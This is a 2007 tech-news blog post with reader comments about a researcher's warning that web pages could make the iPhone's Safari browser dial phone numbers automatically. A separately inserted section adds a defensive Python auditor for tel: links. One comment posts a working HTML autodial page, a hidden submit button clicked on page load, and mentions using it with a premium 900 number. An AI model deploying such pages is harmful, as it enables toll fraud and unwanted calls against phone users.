July 16, 2007
Researchers point to iPhone security risk
Security researchers with Web application testing specialists SPI Dynamics are drawing attention to a feature on Apple's hot new iPhone that they say could be subverted by hackers to attack users of the device and potentially monitor their phone calls.
In a blog post on the security company's Web site on July 16, SPI security researcher Billy Hoffman argues that a feature of the device's Safari browser, which lets iPhone users dial any phone number displayed in the browser by touching the digits on-screen, could soon be subverted by hackers.
If attackers can lure iPhone users to malware sites, or to legitimate sites infected with cross-site scripting attacks, Hoffman said, they could infect the devices with spyware that would let them track calls, redirect calls placed by a user, place unauthorized calls from the browser, program the device to make repeated calls indefinitely, or prevent the phone from making calls at all.
As an example of how schemers could make money off the ruse, Hoffman said that attackers could use the technique to place batches of calls to toll 900 numbers they control.
The researcher with SPI (which was recently acquired by HP) said that the issue was reported to Apple on July 6; however, the iPhone maker has yet to address it in any form of public statement.
Apple representatives didn't immediately respond to calls seeking comment on the issue.
"SPI Labs [is] working with Apple to remediate the problems. However, [we] recognize the unique urgency of these issues and the large number of people that could be affected," Hoffman wrote. "As such, SPI Labs recommends that iPhone users do not use the built-in Safari browser to dial telephone numbers until Apple resolves these issues."
Posted by Matt Hines on July 16, 2007 03:28 PM
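Hoffman's warning comes down to a page that carries a tel: URI and fires it without the user tapping anything. As an added example (not from the article, SPI Dynamics or Apple), the following Python script, standard library only, audits untrusted HTML for tel: targets and for the auto-trigger patterns that turn such a link into an autodialer: an onload handler and a hidden submit control. The sample markup and its 555 numbers are constructed for the demonstration.

```python
from html.parser import HTMLParser

# Attributes whose value the browser may act on as a URI.
URI_ATTRS = {"href", "action", "src"}
# Event handlers that run without any user gesture.
AUTO_EVENTS = {"onload", "onpageshow"}


class TelLinkAuditor(HTMLParser):
    """Collects tel: URIs and the markup that could trigger them automatically."""

    def __init__(self):
        super().__init__()
        self.tel_targets = []     # (tag, attribute, uri)
        self.auto_handlers = []   # (tag, event, handler source)
        self.hidden_submits = 0   # submit controls the user cannot see

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # boolean attributes arrive as None values
        for name in URI_ATTRS:
            value = (attrs.get(name) or "").strip()
            if value.lower().startswith("tel:"):
                self.tel_targets.append((tag, name, value))
        for name in AUTO_EVENTS:
            if name in attrs:
                self.auto_handlers.append((tag, name, attrs[name] or ""))
        if tag == "input" and (attrs.get("type") or "").lower() == "submit":
            style = (attrs.get("style") or "").replace(" ", "").lower()
            if "display:none" in style:
                self.hidden_submits += 1


def audit_html(markup: str) -> dict:
    """Return the tel: findings plus a verdict on whether dialing is automatic."""
    parser = TelLinkAuditor()
    parser.feed(markup)
    parser.close()
    automatic = bool(parser.tel_targets) and bool(parser.auto_handlers or parser.hidden_submits)
    return {"tel_targets": parser.tel_targets, "auto_handlers": parser.auto_handlers,
            "hidden_submits": parser.hidden_submits, "auto_dial_suspected": automatic}


# Constructed sample: a hidden submit clicked on load, plus an ordinary tel: link.
SAMPLE = """<html><head><script>function go(){document.getElementById('d').click();}</script>
</head><body onload="go();"><form method="GET" action="tel:555-0100">
<input type="submit" id="d" value="dial" style="display:none"/></form>
<p>Call <a href="tel:555-0199">support</a>.</p></body></html>"""

if __name__ == "__main__":
    print(audit_html(SAMPLE))
```

A content filter for user-generated HTML would reject or strip the tel: scheme in these attributes, and a browser-side mitigation is a confirmation prompt before any tel: action is carried out.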
COMMENTS
I don't want to say that this doesn't seem like a real problem because I don't know enough about it... but I'm pretty sure that the ability to call and the ability to surf with Safari, although connected by this feature, probably can't be accessed via some web application.
There are certain things that simply can't be hacked yet on the iPhone and they probably won't be. Currently, there's no easy way of compromising the Mac OS X operating system unless someone goes out of their way to do so.
As for a lack of response to this issue, let's imagine that you just made an (arguably) great piece of technology. Everyone makes articles about tiny problems all day. The media tries to destroy it as well as they can. You get a bunch of e-mails and calls all day every day because people want you to make statements based on (arguably) nothing in particular.
You've got meetings to make and a business to run. Who cares about someone's made up threat? Supposed experts are just giving hackers ideas that won't work anyway.
Posted by: K. Mitchell at July 16, 2007 05:43 PM

I discovered this myself 2 days after the release of the iPhone. I was even thinking of setting up a 900 number for iDummies. Below is just one variant:

```html
<html>
<head>
<title>Iphone Autodial</title>
<script type="text/javascript">
// Clicks the hidden submit button as soon as the page has loaded.
function autoClick()
{
    var dial = document.getElementById('dial');
    dial.click();
}
</script>
</head>
<body onload="autoClick();">
<!-- The form's tel: action is what makes Safari start the call. -->
<form method="GET" action="tel:1-312-555-5555">
<input type="submit" id="dial" value="dial" style="display:none"/>
</form>
</body>
</html>
```
K. Mitchell, yes you should have stopped in the first line. It was the only one that made sense. And if you believe for one second some security expert is blowing smoke in that the iPhone can't be exploited through its *Fully Featured* web browser... please... And just so you know, there is nothing safe about the mini OS 10 they shoe-horned into the device. And you were right, you don't know enough about the subject.
Posted by: 1337 at July 17, 2007 10:01 AM